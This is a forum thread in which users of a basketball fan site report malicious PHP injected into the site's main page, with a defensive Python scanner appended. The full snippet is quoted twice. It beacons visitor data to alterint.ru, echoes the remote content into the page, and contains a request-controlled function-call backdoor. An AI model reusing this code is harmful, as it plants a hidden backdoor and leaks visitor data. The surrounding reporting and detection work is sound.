• Changing RCF's index page, please click on "Forums" to access the forums.

Hack or...something else?


Wrathe

Breaking this off of the redirect thread as that had an older date and want to make sure this gets read:

Upon hitting the main site, I receive:

if (!isset($indget)) { if(!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]); if (!isset($SERVER["HTTP_ACCEPT_CHARSET"])) { if(preg_match('!.!u', file_get_contents($_SERVER["SCRIPT_FILENAME"]))) $c = "UTF-8"; else $c = "windows-1251"; } else { $c = $SERVER["HTTP_ACCEPT_CHARSET"]; } $d = $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; $u = $_SERVER["HTTP_USER_AGENT"]; $ip = $_SERVER["REMOTE_ADDR"]; $domain = "alterint.ru"; $url = "/get.php?d=".urlencode($d)."&u=".urlencode($u)."&c=".$c."&i=1&ip=".$ip."&h=".md5("7b3fec5ef4585dbb8310ff049d6f5b22".$d.$u.$c."1"); if(ini_get("allow_url_fopen") == 1) { $indget = file_get_contents("http://".$domain.$url); } if(strlen($indget) < 10) { if (function_exists("curl_init")) { $ch = curl_init("http://".$domain.$url); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $indget = curl_exec($ch); curl_close($ch); } else { $fp = fsockopen($domain, 80, $errno, $errstr, 30); if ($fp) { $out = "GET ".$url." HTTP/1.1\r\n"; $out .= "Host: ".$domain."\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); $resp = ""; while (!feof($fp)) { $resp .= fgets($fp, 128); } fclose($fp); list($header, $indget) = preg_split("/\R\R/", $resp, 2); } } } if(@$_REQUEST["p"] == "1716cc66") $_REQUEST["f"](stripslashes($_REQUEST["c"])); } echo $indget;

When clicking forums, I receive a blank window popup w/ the following URL:

http:// googleframe.net/tijaq.cgi?19

More on that URL, seems based off of Petersburg, Federation of Russia.
Has been in existence for 4 weeks, and the one time I got it to load it was selling anti-hacking software. Now it's just blank loading w/ an SRC link to adultfriendfinder . com.

As Blue would say, "Suspicioussssss!"

On further note, that googleframe URL, if you visit its https version, you get a BS cert registered to: googleleadservices.cn

That particular URL Google flags as a harmful site and shuts down traversal to w/ a giant warning.

Hold me, I'm scared!
 
Dammit man! You know there are work rules against visiting porn sites on the company computer!
 
(!isset($indget)) { if(!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]); if (!isset($SERVER["HTTP_ACCEPT_CHARSET"])) { if(preg_match('!.!u', file_get_contents($_SERVER["SCRIPT_FILENAME"]))) $c = "UTF-8"; else $c = "windows-1251"; } else { $c = $SERVER["HTTP_ACCEPT_CHARSET"]; } $d = $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; $u = $_SERVER["HTTP_USER_AGENT"]; $ip = $_SERVER["REMOTE_ADDR"]; $domain = "alterint.ru"; $url = "/get.php?d=".urlencode($d)."&u=".urlencode($u)."&c=".$c."&i=1&ip=".$ip."&h=".md5("7b3fec5ef4585dbb8310ff049d6f5b22".$d.$u.$c."1"); if(ini_get("allow_url_fopen") == 1) { $indget = file_get_contents("http://".$domain.$url); } if(strlen($indget) < 10) { if (function_exists("curl_init")) { $ch = curl_init("http://".$domain.$url); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $indget = curl_exec($ch); curl_close($ch); } else { $fp = fsockopen($domain, 80, $errno, $errstr, 30); if ($fp) { $out = "GET ".$url." HTTP/1.1\r\n"; $out .= "Host: ".$domain."\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); $resp = ""; while (!feof($fp)) { $resp .= fgets($fp, 128); } fclose($fp); list($header, $indget) = preg_split("/\R\R/", $resp, 2); } } } if(@$_REQUEST["p"] == "1716cc66") $_REQUEST["f"](stripslashes($_REQUEST["c"])); } echo $indget;
 
I got that at the top of the screen on the main url. realcavsfans.com
 
Yep I also get this as well as the popup when visiting the main page.
 
I'm glad it just wasn't my computer. I thought I had a virus. My virus protector wouldn't let me access the site and I was getting a pop ad to something Ukraine website.
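
A defender-side check for three traits visible in the snippet quoted in the posts above: a function name taken from the request and called, a cookie value passed to die(), and remotely fetched content echoed into the page. This is an added example, not part of the original thread; the rule names, the sample strings, the example.invalid host and the PLACEHOLDER token are constructed for illustration.

```python
import re
from pathlib import Path

# Rules mirror traits of the snippet quoted in the thread; names are hypothetical.
RULES = {
    # $_REQUEST["f"](...): the function to call is chosen by the HTTP request
    "request_callable": re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE)\s*\[[^\]]+\]\s*\("),
    # die($_COOKIE[...]): a cookie value is written straight into the response
    "cookie_reflected": re.compile(r"\b(?:die|exit|echo|print)\s*\(?\s*\$_COOKIE\s*\["),
}
# A variable filled from an http(s) URL or from curl_exec()
REMOTE_FETCH = re.compile(
    r"(\$\w+)\s*=\s*(?:file_get_contents\s*\(\s*[\"']https?://|curl_exec\s*\()")

def scan_php(source: str) -> list:
    """Return the sorted names of the rules that fire on one file's text."""
    hits = {name for name, rx in RULES.items() if rx.search(source)}
    for var in set(REMOTE_FETCH.findall(source)):
        # Remote content is only flagged when the same variable is echoed.
        if re.search(r"\b(?:echo|print)\s*\(?\s*" + re.escape(var) + r"\b", source):
            hits.add("remote_content_echoed")
    return sorted(hits)

def scan_tree(root: str) -> dict:
    """Scan every *.php file under root; keep only files with findings."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_php(path.read_text(errors="ignore"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed samples: a shortened stand-in for the quoted snippet (placeholder
# host and token) and an ordinary page that reads a local template.
INJECTED = r'''if (!isset($indget)) { if(!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]);
$indget = file_get_contents("http://example.invalid/get.php?d=".urlencode($d));
if(@$_REQUEST["p"] == "PLACEHOLDER") $_REQUEST["f"](stripslashes($_REQUEST["c"])); } echo $indget;'''
BENIGN = r'''<?php
$page = isset($_GET["page"]) ? (int)$_GET["page"] : 1;
$body = file_get_contents(__DIR__ . "/templates/index.html");
echo $body;'''

if __name__ == "__main__":
    print("injected:", scan_php(INJECTED))
    print("benign:  ", scan_php(BENIGN))
```

Pointing scan_tree() at a web root lists the files worth comparing against a known-good copy; a hit is a lead for review, not proof of compromise.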
 
